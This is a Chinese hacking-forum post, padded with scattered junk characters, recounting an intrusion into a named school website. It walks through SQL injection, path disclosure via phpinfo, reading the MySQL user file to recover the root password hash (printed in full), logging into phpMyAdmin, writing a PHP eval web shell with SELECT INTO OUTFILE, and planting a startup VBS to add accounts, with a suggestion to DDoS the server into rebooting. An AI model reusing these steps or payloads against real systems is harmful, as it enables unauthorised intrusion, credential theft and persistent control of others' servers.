第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
, D& v4 c' i/ y3 D$ E9 p( K发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
0 o3 X+ Q- j, g* z( r j
! m1 U1 _9 i/ g/ i
2 B9 L) @* i/ f, W @4 W( ~" |/ _, M! H! q: v! H
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
9 Z3 n7 U3 B6 R7 R8 o. ~1 b! S9 ] D
那么想可以直接写入shell ,getshell有几个条件:
0 g% x! d, X5 f9 U4 n1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
4 u$ x7 Z4 b: R1 F. x. B) H! Y( Q I$ j+ E' m' m
试着爆绝对路径: + J2 \ q$ z* \/ k
1./phpMyAdmin/index.php?lang[]=1
. r6 O ]* {: M% Y. ~6 j2./phpMyAdmin/phpinfo.php
% P5 I* r4 o0 a8 K- j, P, d3./load_file() 6 e: t! Z/ b5 Y1 i+ t" G! P
4./phpmyadmin/themes/darkblue_orange/layout.inc.php 2 y3 B7 ^. }0 m' h; X, j4 T6 X
5./phpmyadmin/libraries/select_lang.lib.php 6 T$ u4 J4 j, n2 w6 g" l; G
6./phpmyadmin/libraries/lect_lang.lib.php % S$ k7 E' P0 `2 w8 c) d# K
7./phpmyadmin/libraries/mcrypt.lib.php % c6 {. I' T, u$ B" \0 Y! P
8./phpmyadmin/libraries/export/xls.php
; e# @& g8 `; v1 ~9 t8 ~+ Q* A- E7 p, r9 X
均不行........................... % ^8 [; J3 m1 |) B
3 l4 Q( z# H' b8 S御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php H. K# s: T: H: m9 ~6 o: ~
/ E: y' m! |" [* G$ S; Y \4 ^ m
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
: g: _0 a0 T; B/ l e1 H+ _ H4 R" V( Y$ N' s* C
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ( u3 Y" U8 Q/ |
4 z' x+ B- f% ~4 x6 j
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 5 Z. Z) K: q- [7 l7 d2 s& w2 i1 y
" S8 h# B' o; X% R2 K
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 5 H' R" n3 \' w: q S: K
; q6 Y# D7 D8 ^
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 ^" ?; U! g' q1 y! M. n1 `
* ]& A" j- w% a7 ^
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD . K! A* C. V( H4 o5 i5 ~0 u, b
" N0 M) p/ u8 F9 W u6 W成功读到root密码: 9 Y& _( O+ D9 U9 C
, |% ~0 d/ V% Z$ w$ j( F4 C6 W17---- r(0072) ; j9 I, @. o: d4 F7 X& ^& d! f( E
18---- o(006f)
- Z. X% ^3 S6 G0 j; w& N# n19---- o(006f) 1 u0 ^( v) l' I* v
20---- t(0074) 4 U+ r/ n* e. x0 D( q7 [
21---- *(002a)
8 c; c, `; Y. I# k22---- 8(0038)
; n- h# W6 |! q4 Y% n0 Z23---- 2(0032)
; a+ [# C! T$ m, Q. U) a2 [24---- E(0045) ( w( n, U& R9 G+ M8 @( L
25---- 1(0031)
, Q3 w9 m" _2 I2 `26---- C(0043)
. o% f9 x4 f0 _27---- 5(0035)
5 L7 W2 P) u, f8 U. }1 c' ?: h28---- 8(0038)
. H4 S! L W' i/ \3 o. r29---- 2(0032) ' @3 a; ]$ W$ N9 i/ ` }
30---- 8(0038) 6 J) g. F6 s' R( D2 e* f
31---- A(0041)
, z0 n& ~; W+ v: P6 o32---- 9(0039)
) S/ Y2 ^8 U7 I' i W33---- B(0042) 8 r( [: y7 A/ E2 t3 W+ |" W
34---- 5(0035)
; ~0 S( t8 H6 ^% x" f! K% M35---- 4(0034) # j. F! ?5 G6 Z/ `; N
36---- 8(0038)
/ U7 X' r; G% ] I2 \. l37---- 6(0036)
( e. O/ r9 i; T38---- 4(0034)
6 j: M }' U b0 y6 ~% N$ d- \) F6 U39---- 9(0039)
8 }" j5 C$ Q$ ^2 ]& E3 U40---- 1(0031)
9 G8 C7 j0 u$ u( R0 G5 B6 {7 Q41---- 1(0031)
. L9 u" G% D4 U! j42---- 5(0035) 4 ]4 I" G! B J* A I# k3 D
43---- 3(0033) # V% y6 d! H$ B# E ~
44---- 5(0035) 1 Q, o8 l A( J8 P
45---- 9(0039)
* ?( g, A5 r6 h$ V& r5 G. V46---- 8(0038) 1 o2 U ]. l+ S+ B5 h
47---- F(0046) " `, |% {: B; I2 K* W3 ~* U
48---- F(0046) 5 z7 x% Y& q. d# r
49---- 4(0034) ( W( p% |& ]$ r. E8 ~6 m& Q
50---- F(0046) , l8 g, N( \) T
51---- 0(0030) * G d0 P1 d c* s/ _, c/ L( @
52---- 3(0033) 1 q" T% q% D( R4 d z) i* E2 u
53---- 2(0032) ; V0 e$ ^/ H0 L6 T; \" b! Y' ?- l
54---- A(0041) ( y+ P. ?2 @( Q
55---- 4(0034)
8 |+ U+ Q2 \0 g; j. a56---- A(0041)
( T/ k' |: ~- ^0 x3 v57---- B(0042) 9 y# {9 v$ g+ `# S' q- @
58---- *(0044) , G# o% j/ h# N: `' T
59---- *(0035) " s B" X/ m8 k, I' p
60---- *(0041) + E6 E6 o! x: E+ T9 j3 O
61---- *0032) 7 V: P- g q/ ^7 f. @8 m) r, m
! m! w1 n! M* z+ H4 N; |7 W9 e
解密后成功登陆phpmyamin
_+ k( i( A1 x% P
* _8 s9 ~1 E3 B( a
! d9 D* l( \; `" {- L9 G9 u4 v; F
e7 \. N- l+ }. ?9 r
0 `) |% R6 z( `/ \+ H8 M% \找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 1 y; s* u6 O6 v2 }; y g j% ~& f
4 ]3 [6 s' c C0 Z$ Y3 w, N, a成功执行,拿下shell,菜刀连接: + b! L8 A, [7 u, M
8 O; t+ @, I6 ?3 ]! e服务器不支持asp,aspx,php提权无果................... - R) e! Y1 I5 {& p w0 V
- E# O; b7 }* E. {2 n2 M
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
5 h0 Q/ K; }- g7 b2 u. c7 D服务器上已经有个隐藏帐号了 5 g$ ]$ q, ]. ~, X+ ~2 H R) ~5 E
别名 administrators* x3 j% k6 v& z2 w* E' l
注释 管理员对计算机/域有不受限制的完全访问权
' A+ ?1 {. U, O& c+ V成员
: X9 |5 K; J& _. R: a3 y-------------------------------------------------------------------------------
6 d8 [" g+ h* Q$ Kadmin
; c& y/ Y- i1 j5 P9 XAdministrator
9 R; C/ _5 G0 R. ^) M4 a( ^3 Cslipper$+ C3 `( J: K+ T
sqluser- T9 X- e/ {' B% |3 x
命令成功完成。 0 K: `8 z8 {# ^" B/ b$ q! B1 S
3 i, w) }: T/ o* s# |服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。) U0 X6 \" |' |2 w
" o$ [$ D' h hddos服务器重启,不然就只能坐等服务器重启了...............................* O' I0 i1 H7 C& o2 \
$ {; U' o1 f( \$ W ) t B8 a, l: x8 o/ u
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
